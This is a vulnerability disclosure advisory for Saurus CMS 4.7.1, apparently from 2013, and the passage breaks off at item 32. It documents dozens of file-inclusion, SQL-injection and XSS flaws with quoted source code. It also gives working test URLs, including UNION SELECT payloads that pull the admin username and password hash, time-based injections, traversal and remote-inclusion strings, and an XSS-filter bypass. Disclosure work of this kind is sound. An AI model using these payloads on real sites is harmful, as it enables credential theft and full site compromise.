Код:
Saurus CMS 4.7.1 LFI / RFI / XSS / SQL Injection / Traversal / CSRF
Author: Janek Vind "waraxe"
Date: 14. July 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-106.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Web publishing system combining daily content management features with site
administration and development tools.
http://www.saurus.info/
Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:
http://www.saurus.info/version-history/
###############################################################################
1. Local File Inclusion in "admin/fckeditor_dialog_image.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "dialog"
Preconditions:
1. Logged in as Saurus CMS user
2. At least one valid file ID must be known (can be bruteforced)
Php script "admin/fckeditor_dialog_image.php" line 101:
------------------------[ source code start ]----------------------------------
$object = new Objekt(array(
'objekt_id' => (int)$site->fdat['file_id'],
'on_sisu' => 1,
));
..
include_once('../js/fckeditor/editor/'.$site->fdat['dialog']);
------------------------[ source code end ]------------------------------------
Test (parameter "file_id" must be valid):
http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess
Result: contents of ".htaccess" file from Saurus CMS root directory will be
revealed, LFI confirmed.
###############################################################################
2. Local File Inclusion in "extensions/saurus4/captcha_image.php"
###############################################################################
Reason:
1. uninitialized variable "$captcha"
Attack vector:
1. user-supplied parameter "captcha"
Preconditions:
1. PHP setting "register_globals = on"
Php script "extensions/saurus4/captcha_image.php" line 45:
------------------------[ source code start ]----------------------------------
switch ($captcha['image_type'])
{
case 'gif':
include_once($class_path.'lgpl/GotchaGIF.class.php');
$img = new GotchaGIF($captcha['image_width'], $captcha['image_height']);
break;
..
if($img->create())
{
//apply effects
foreach($captcha['effects'] as $effect)
{
$effect_name = $effect['name'];
//echo $effect_name;
include_once($class_path.'lgpl/'.$effect_name.'.class.php');
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/extensions/saurus4/captcha_image.php?
captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&
captcha[effects][0][name]=../waraxe
Result:
Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]:
failed to open stream: No such file or directory in
C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73
PHP error message above confirms LFI vulnerability.
###############################################################################
3. Local File Inclusion in "admin/edit.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "extension_path"
Preconditions:
1. Logged in as Saurus CMS user
Php script "admin/edit.php" line 76:
------------------------[ source code start ]----------------------------------
if($site->fdat['extension_path'])
{
$actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php';
..
if (file_exists($actions_file)){
include_once($actions_file);
------------------------[ source code end ]------------------------------------
###############################################################################
4. Remote File Inclusion in "map.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "cmd"
Preconditions:
1. Windows server
Php script "map.php" line 56:
------------------------[ source code start ]----------------------------------
$tmp_cmd=explode("/",$_GET['cmd']);
..
foreach($tmp_cmd as $t){
// if the there is a .php in the URL then don't use aliases go directly to that file
if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t))
..
include($t);
------------------------[ source code end ]------------------------------------
On *nix servers this code above is secure enough, but things change in case of
Windows server - attacker is able to use backslashes, which leads to RFI.
Example attack using local file:
http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php
Example attack using remote file:
http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php
###############################################################################
5. Remote File Inclusion in "admin/change_config.php"
###############################################################################
Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"
Php script "admin/change_config.php" line 25:
------------------------[ source code start ]----------------------------------
global $class_path;
..
if(!isset($class_path)) {
$class_path = "../classes/";
}
..
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?
###############################################################################
6. Remote File Inclusion in "admin/repair_database.php"
###############################################################################
Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"
Php script "admin/repair_database.php" line 23:
------------------------[ source code start ]----------------------------------
global $class_path;
if(!isset($class_path)) {
$class_path = "../classes/";
}
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?
###############################################################################
7. Remote File Inclusion in "admin/check_adminpage.php"
###############################################################################
Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"
Php script "admin/check_adminpage.php" line 29:
------------------------[ source code start ]----------------------------------
if(!isset($class_path)) { $class_path = "../classes/"; }
include($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?
###############################################################################
8. SQL Injection in "index.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "pg"
Preconditions:
1. PHP setting "magic_quotes_gpc = Off"
Php script "index.php" line 303:
------------------------[ source code start ]----------------------------------
if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] &&
!$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
$myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
$sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON
keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
$sth = new SQL($sql);
$mykeel = $sth->fetchsingle();
------------------------[ source code end ]------------------------------------
As seen above, user-submitted GET parameters "id" and "pg" are checked to be
numeric before using them in SQL query. If we analyze source code more closely,
then it appears to be not as secure as planned by programmer. Attacker can input
GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection
string containing single quote. As parameter "id" is numeric, checking code will
be bypassed. Next line of code tests parameter "id" and because it is zero,
variable "$myid" will get value from parameter "pg". This leads to SQL Injection.
Test 1:
http://localhost/saurus471/?speed_debug=on&id=0&pg=123
Result: "Page was generated in 1.20000 seconds.", normal server response.
Test 2:
http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23
Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection
confirmed.
###############################################################################
9. SQL Injection in "classes/sapi/function.init_search_results.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sites"
Preconditions: none
Php script "classes/sapi/function.init_search_results.php" line 27:
------------------------[ source code start ]----------------------------------
function smarty_function_init_search_results($params,&$smarty) {
..
if(!isset($sites)) $sites = $site->fdat['sites'];
..
$pre_search_explode=explode(",",strtolower(trim($sites)));
foreach($pre_search_explode as $k=>$v){
$pre_search_explode[$k]=trim($v);
}
$sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')";
..
$sth = new SQL($sql_keel);
while($r = $sth->fetch("ASSOC")){
$keeled[]=$r['keel_id'];
------------------------[ source code end ]------------------------------------
As seen above, user-submitted parameter "sites" ends up used in SQL query
without proper sanitization, which leads to SQL Injection vulnerability.
Test 1:
http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe
Result: "Page was generated in 1.18560 seconds.", normal server response.
Test 2:
http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23
Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection
confirmed.
###############################################################################
10. SQL Injection in "admin/error_log.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/error_log.php" line 63:
------------------------[ source code start ]----------------------------------
$algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d);
$lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y");
..
if ($algus_aeg) {
$where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' ";
}
if ($lopp_aeg) {
$where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' ";
}
if ($site->fdat['err_type']) {
$where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' ";
}
..
$where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : '';
..
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC';
..
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*");
$sql .= $from_sql;
$sql .= $where_str;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while ( $log = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------
Test 1:
http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
Result:
MySQL version info will be revealed
Test 2:
http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
Result:
Username and password hash of the Saurus CMS user with ID 1 will be revealed
###############################################################################
11. SQL Injection in "admin/extensions.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/extensions.php" line 297:
------------------------[ source code start ]----------------------------------
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC';
..
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*");
$sql .= $from_sql;
$sql .= $order;
..
$sth = new SQL($sql);
..
while ( $ext = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------
Test 1:
http://localhost/saurus471/admin/extensions.php?sortby=1
Result: normal server response, no additional delay.
Test 2:
http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23
Result: additionial delay observed, SQL Injection confirmed.
###############################################################################
12. SQL Injection in "admin/profile_data.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/profile_data.php" line 521:
------------------------[ source code start ]----------------------------------
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
..
$sql .= $from_sql;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
$sth = new SQL($sql);
..
if($sth->rows){
..
while($asset = $sth->fetch()){
------------------------[ source code end ]------------------------------------
###############################################################################
13. SQL Injection in "classes/user_html.inc.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin
Php script "classes/user_html.inc.php" line 313:
------------------------[ source code start ]----------------------------------
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
..
$sql = $site->db->prepare("SELECT users.* FROM users ");
$sql .= $join;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
..
$sth = new SQL($sql);
..
while($tmp = $sth->fetch()){
------------------------[ source code end ]------------------------------------
###############################################################################
14. SQL Injection in "admin/sys_sonad_loetelu.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sst_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/sys_sonad_loetelu.php" line 123:
------------------------[ source code start ]----------------------------------
$sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']);
if(is_numeric($site->fdat['flt_keel']))
{
..
$otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR
sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE
'%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR
sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id;
$where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ",
$keel_id,
1
);
..
$sql .= $where_str;
..
$sth = new SQL($sql);
..
while ( $mysona = $sth->fetch('ASSOC') )
{
$words[] = $mysona;
}
------------------------[ source code end ]------------------------------------
Test 1:
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23
Result:
MySQL version info will be revealed
Test 2:
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
Result:
Username and password hash of the Saurus CMS user with ID 1 will be revealed
###############################################################################
15. SQL Injection in "admin/change_config.php"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "timezone"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/change_config.php" line 153:
------------------------[ source code start ]----------------------------------
$q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'";
new SQL($q);
------------------------[ source code end ]------------------------------------
###############################################################################
16. Stored XSS in "admin/log.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "user"
Preconditions:
1. 1. "Enable site log" enabled (it is by default)
Php script "classes/site.class.php" line 538:
------------------------[ source code start ]----------------------------------
if($this->fdat["op"] == 'login' && $this->fdat["url"] &&
$this->CONF['disable_form_based_login'] != "1") {
$this->user = new User(array(
user => $this->fdat["user"],
pass => $this->fdat["pass"],
"site" => &$this,
));
$user_id = $this->user->user_id;
if ($user_id) {
..
else {
# kirjuta logi
new Log(array(
'action' => 'log in',
'component' => 'Users',
'type' => 'NOTICE',
'message' => "Unauthorized access to CMS:
username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
));
------------------------[ source code end ]------------------------------------
As seen above, in case of failed login attempt site log entry will be created,
containing various information, including submitted username.
Php script "admin/log.php" line 265:
------------------------[ source code start ]----------------------------------
<?php foreach ($log_records as $log_record) { //printr($log_record); ?>
..
<td><?=$log_record['message'];?></td>
------------------------[ source code end ]------------------------------------
We can see, that php script "admin/log.php", used by admins for sitelog view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion,
2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin
account creation, 4. attacker logs in as new admin, game over ...
Test:
1. Issue GET request as below:
http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script>
2. Log in as Saurus CMS admin and open site log page:
http://localhost/saurus471/admin/log.php
Result:
javascript alert box pops up, confirming Stored XSS vulnerability.
###############################################################################
17. Stored XSS in "admin/error_log.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Preconditions:
1. "Save PHP and MySQL errors into the database" enabled (it is by default)
Php script "classes/port.inc.php" line 150:
------------------------[ source code start ]----------------------------------
function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){
..
if (!defined("SAVE_ERROR_LOG")){
$res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
if ($res){
list($tmp) = @mysql_fetch_array($res);
}
define("SAVE_ERROR_LOG", ($tmp ? 1:0));
}
if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
@mysql_query("INSERT INTO error_log (time_of_error, source, err_text,
err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(),
'".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."',
'PHP', '".addslashes($_SERVER['HTTP_HOST'])."',
'".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat).
"', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
}
}
}
# Redefine error handler
$old_error_handler = set_error_handler("saurusErrorHandler");
------------------------[ source code end ]------------------------------------
As seen above, new PHP error handler is defined, which writes all PHP error
messages to error log in database.
Php script "admin/error_log.php" line 320:
------------------------[ source code start ]----------------------------------
<td width="60%"><?= $log['err_text'] ?></td>
------------------------[ source code end ]------------------------------------
We can see, that php script "admin/log.php", used by admins for error log view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise by similar scenario as described in previous case.
Test:
1. Issue GET request as below (MySQL Injection from one of the previous cases):
http://localhost/saurus471/?id=0&pg='<script>alert(123);</script>
2. Log in as Saurus CMS admin and open erro log page:
http://localhost/saurus471/admin/error_log.php
Result:
javascript alert box pops up, confirming Stored XSS vulnerability.
###############################################################################
18. XSS protection bypass in "classes/port.inc.php"
###############################################################################
Php script "classes/port.inc.php" line 536:
------------------------[ source code start ]----------------------------------
if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
detect_xss_in_string($_SERVER['PHP_SELF']) ||
detect_xss_in_saurus_params($_POST) ||
detect_xss_in_saurus_params($_GET))
)
{
header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php');
exit;
}
------------------------[ source code end ]------------------------------------
We can see, that XSS detection functions are used against various input parameters
and in case of positive hit redirection to home page follows. There is custom
exclusion in place for administrative scripts and it's implementation is not
secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string
in URI and XSS detection will be bypassed.
String for XSS detection bypass is "/saurus471/admin/" in examples below.
Test 1:
http://localhost/saurus471/kalender.php?month=<script>
Result: XSS detected, redirection follows
Test 2:
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script>
Result: XSS not detected, no redirection
###############################################################################
19. Reflected XSS in "kalender.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions: none
Php script "kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
..
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>
Results:
javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
20. Reflected XSS in "editor/kalender.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions:
1. must be logged in as user
Php script "editor/kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
..
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
..
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>
Results:
javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
21. Reflected XSS in "admin/delete_log.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "tbl"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/delete_log.php" line 176:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
22. Reflected XSS in "admin/edit_adminpage.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "id" and "op"
Preconditions:
1. logged in as Saurus CMS admin
Tests:
http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script>
http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script>
Results:
javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
23. Reflected XSS in "admin/edit_group.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "group_id"
Preconditions:
1. logged in as Saurus CMS admin
Tests:
http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script>
Result:
javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
24. Reflected XSS in "admin/profile_data.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/profile_data.php" line 65:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
25. Reflected XSS in "admin/edit_object.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/edit_object.php" line 101:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>";
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
26. Reflected XSS in "admin/edit_profile.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "pid"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/edit_profile.php" line 997:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
27. Reflected XSS in "admin/profiles.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "profile_id", "source_table", "did"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/profiles.php" line 247:
------------------------[ source code start ]----------------------------------
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?>
..
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?>
&source_table=<?= $site->fdat['source_table']?>
..
<TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?>
&did=<?= $site->fdat['did']?>'
..
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?>
..
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?>
&did=<?=$site->fdat['did']?>'
..
<TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync"
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script>
Results:
javascript alert boxes popping up, confirming Reflected XSS vulnerability.
###############################################################################
28. Reflected XSS in "admin/sys_alias.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin
Test:
http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script>
Result:
javascript alert boxes popping up, confirming Reflected XSS vulnerability.
###############################################################################
29. Reflected XSS in "admin/sys_sonad_loetelu.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel"
Preconditions:
1. logged in as Saurus CMS admin
Test:
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
30. Reflected XSS in "admin/user_management.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/user_management.php" line 138:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">';
}
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script>
Result:
javascript alert box pops up, confirming Reflected XSS vulnerability.
###############################################################################
31. Reflected XSS in "admin/permissions.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/permissions.php" line 229:
------------------------[ source code start ]----------------------------------
<input type=hidden id="selectform_selected_group" name="selected_group"
value="<?=$site->fdat['selected_group']?>">
<input type=hidden id="selectform_user_id" name="user_id"
value="<?=$site->fdat['user_id']?>">
<input type=hidden id="selectform_group_id" name="group_id"
value="<?=$site->fdat['group_id']?>">
------------------------[ source code end ]------------------------------------
Test:
http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script>
Result:
javascript alert boxes popping up, confirming Reflected XSS vulnerability.
###############################################################################
32. Reflected XSS in "admin/file_source.php"
###############################################################################
Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied GET parameter "selected_group"
Preconditions:
1. logged in as Saurus CMS admin
Php script "admin/file_source.php" line 47:
------------------------[ source code start ]----------------------------------
